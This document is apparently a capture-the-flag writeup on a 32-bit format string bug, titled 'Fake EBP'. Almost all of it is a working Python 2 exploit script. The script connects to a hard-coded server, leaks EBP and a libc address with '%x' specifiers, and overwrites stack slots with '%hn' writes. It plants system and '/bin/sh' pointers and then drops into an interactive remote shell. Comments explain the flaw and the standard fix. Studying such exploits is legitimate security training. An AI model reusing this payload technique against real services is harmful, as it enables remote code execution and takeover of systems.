32-bit Format String Bug
Exploit: Fake EBP
The difference between the server's library and my local one made me go nuts
from socket import *
import re
from struct import pack
def p(x):
    """Pack *x* as a little-endian unsigned 32-bit integer (``struct`` format ``<I``)."""
    return pack("<I", x)
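def recv_until(s, data):
    """Read from *s* one byte at a time until *data* has been seen.

    Args:
        s: a connected socket, or any object exposing ``recv(n)``.
        data: the delimiter to wait for; it is returned as part of the buffer.

    Returns:
        Everything received up to and including the first occurrence of *data*.

    Raises:
        EOFError: if the peer closes the connection (``recv`` returns an empty
            string) before *data* arrives. The original looped forever here,
            because an empty chunk never makes ``data in buf`` true.
    """
    # Local is named 'buf' rather than 'p' so it no longer shadows the
    # module-level packing helper of the same name.
    buf = s.recv(1)
    while data not in buf:
        chunk = s.recv(1)
        if not chunk:
            raise EOFError('connection closed before %r was received' % (data,))
        buf += chunk
    return buf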
def shell(s):
    """Hand the connected socket *s* over to an interactive telnet-style session.

    ``telnetlib`` is imported locally because nothing else in the script uses
    it. The Telnet object is created without connecting and its socket is
    replaced by *s*, so ``interact()`` relays the local terminal over our
    existing connection.
    NOTE: telnetlib was removed from the standard library in Python 3.13.
    """
    from telnetlib import Telnet
    session = Telnet()
    session.sock = s
    session.interact()
# --- Exploit driver (Python 2: print statements, backtick repr, str-based sockets) ---
# What the writeup shows being abused: the "Description" field is echoed back
# through a printf-style call with the user string used as the FORMAT, so
# "%N$x" reads a stack slot and "%N$hn" writes one. The defender-side fix is
# the standard one: never pass untrusted data as a format string
# (printf("%s", buf)) and build with -Wformat-security / FORTIFY_SOURCE so the
# compiler and libc reject this pattern.
# NOTE(review): the socket gets no timeout and recv_until() reads one byte at a
# time, so a dead or silent peer hangs the script instead of failing. The
# re.findall(...)[0] / [1] lookups also raise IndexError if the server's
# output format ever differs from "Description: <value>".
s = socket(2,1)  # socket(AF_INET, SOCK_STREAM) written with the raw constant values 2 and 1
s.connect(('54.165.223.128', 2555))  # the challenge server recorded in the writeup
# leak EBP
# Menu protocol as inferred from the sends below (verify against the binary):
# '1' seems to add a record (name, a numeric field, a size, then a description)
# and '4' seems to print the records back, which is where the format string fires.
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB1\n')
s.send('0101234\n')
s.send('512\n')
s.send('%6$x\n')  # dump stack argument 6 as hex; the author identifies it as EBP
recv_until(s, '>>> ')
s.send('4\n')
EBP = recv_until(s, '>>> ')
EBP = re.findall("Description: (.+)", EBP)[0]  # only one record exists yet, so index 0
EBP = int(EBP, 16)
print 'EBP =',hex(EBP)
# leak library address
s.send('1\n')
s.send('BBBB2\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')  # dump stack argument 2; used below as a pointer into the remote libc
recv_until(s, '>>> ')
s.send('4\n')
data = recv_until(s, '>>> ')
t = re.findall("Description: (.+)", data)[1]  # index 1: two records are printed now, this is the second
t = int(t, 16)
print 'SYSTEM_LIB', hex(t)
# Records 3-5 carry a harmless '%2$x'. Presumably filler so that the later
# entries land in the stack slots (33 and 69) the writes below depend on;
# the slot layout is not visible from this script, so treat that as a guess.
s.send('1\n')
s.send('BBBB3\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB4\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB5\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB6\n')
s.send('0101234\n')
s.send('512\n')
# 45860 == 0xb324. '%hn' stores the number of characters printed so far as a
# 16-bit value through the pointer found in argument 6 -- the slot the leak
# above read as EBP, which is what the title's "Fake EBP" refers to.
s.send('%45860c%6$hn\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB7\n')
s.send('0101234\n')
s.send('512\n')
# Backtick repr plus rstrip('L') drops the 'L' suffix Python 2 puts on longs.
# Writes the low 16 bits of EBP+2 through argument 33; presumably this plants
# the pointer that argument 69 dereferences in the next record -- unverified.
payload = '%'+`((EBP+2)&0xffff)`.rstrip('L')+'c%33$hn'
s.send(payload+'\n')
print payload
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB8\n')
s.send('0101234\n')
s.send('512\n')
# 2052 == 0x0804: the high half. Together with the 0xb324 written earlier this
# assembles 0x0804b324, the address noted on the 'ASDF' record below.
s.send('%2052c%69$hn\n')
system_libc = t - 53777 + 2 # this made me crazy... server libc != local libc
# Both offsets are specific to the remote libc build; the '+ 2' is an empirical
# fix-up the author needed once the server libc turned out to differ locally.
binsh = system_libc + 1181844
recv_until(s, '>>> ')
s.send('1\n')
# Record name = [system][binsh][binsh][binsh] as packed 32-bit values. Looks
# like the data the fake frame pointer lands on; the exact frame layout depends
# on the binary's record format and cannot be confirmed from this script.
payload = p(system_libc)
payload += p(binsh)*3
s.send(payload + '\n')
s.send('0101234\n')
s.send('512\n')
s.send('ASDF\n') # 0x804b324
recv_until(s, '>>> ')
s.send('4\n')  # printing the records is the trigger; the session is expected to be a shell afterwards
recv_until(s, '>>> ')
print 'Done'
shell(s)